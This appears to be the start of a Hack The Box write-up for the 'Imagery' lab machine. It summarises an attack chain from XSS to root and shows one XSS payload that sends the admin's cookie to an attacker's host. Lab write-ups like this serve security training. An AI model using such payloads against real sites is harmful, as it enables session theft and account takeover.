Imagery

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Linux

Date: 2025-11-05

Author: x4cc3

Executive Summary

Imagery is a Medium Linux machine running a Flask image app on port 8000. An XSS via "Report a Bug" steals the admin session. The admin panel has LFI leaking the database with MD5 hashes. Command injection in image crop params gives a shell. An AES-encrypted backup is cracked for mark's password. A sudo-allowed binary (charcol) is exploited via cron job injection for root.

Recon

Port Service
22/tcp SSH
8000/tcp HTTP — Flask image app

Imagery landing page

Imagery landing page

Registration page

Registration page

Exploitation

XSS → Admin Cookie

<img src=1 onerror="document.location='<http://10.10.15.55:8888/steal?c='+document.cookie>">

Burpsuite inspection

Burpsuite inspection

Report a Bug feature

Report a Bug feature

Submitted via "Report a Bug" — when admin reviewed it, the cookie was sent to the attacker.